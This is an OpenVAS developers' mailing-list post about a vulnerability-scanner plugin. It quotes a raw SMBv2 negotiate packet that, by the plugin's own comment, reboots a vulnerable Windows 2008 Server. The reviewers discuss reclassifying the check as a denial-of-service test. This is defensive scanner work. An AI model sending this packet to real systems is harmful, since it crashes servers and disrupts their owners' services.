[Openvas-devel] [Openvas-commits] r5349 - in trunk/openvas-plugins: . scripts

Tim Brown timb at openvas.org
Mon Oct 5 23:57:06 CEST 2009


(moved to openvas-plugins)

On Monday 05 October 2009 20:59:07 Thomas Reinke wrote:
> >    trunk/openvas-plugins/scripts/ms_smb2_highid.nasl
> >
> > + script_category(ACT_GATHER_INFO);
> >
> > +data =
> > raw_string(0x00,0x00,0x00,0x90,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x
> >00,0x18,0x53,0xc8, +                 
> > 0x00,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xf
> >f,0xfe, +                 
> > 0x00,0x00,0x00,0x00,0x00,0x6d,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x5
> >7,0x4f, +                 
> > 0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x0
> >0,0x02, +                 
> > 0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00,0x02,0x57,0x69,0x6e,0x6
> >4,0x6f, +                 
> > 0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,0x72,0x6b,0x67,0x72,0x6f,0x7
> >5,0x70, +                 
> > 0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x3
> >0,0x30, +                 
> > 0x32,0x00,0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,0x00,0x02,0x4
> >e,0x54, +                 
> > 0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0x02,0x53,0x4d,0x42,0x20,0x3
> >2,0x2e, +                  0x30,0x30,0x32,0x00); # Tested against 2008
> > Server. A vulnerable Server doing a reboot. I'm not happy with that, but
> > a the moment i have no idea how to detect this vulnerability without
> > exploiting it. +
>
> I suspect this script should be classified as ACT_DENIAL
> rather than ACT_GATHER_INFO, given that it causes the
> vulnerable server to reboot.

I agree.  For the record, the /safe/ version of the check would be just to 
check for SMBv2 support and flag it as a possible issue.  It's not perfect 
but AFAIK it is all that can be done at the moment.  You might also be able 
to fix up the packet so that it uses values that are unlikely to trigger the 
crash but I haven't investigated that in any detail.

Tim
-- 
Tim Brown
<mailto:timb at openvas.org>
<http://www.openvas.org/>


More information about the Openvas-devel mailing list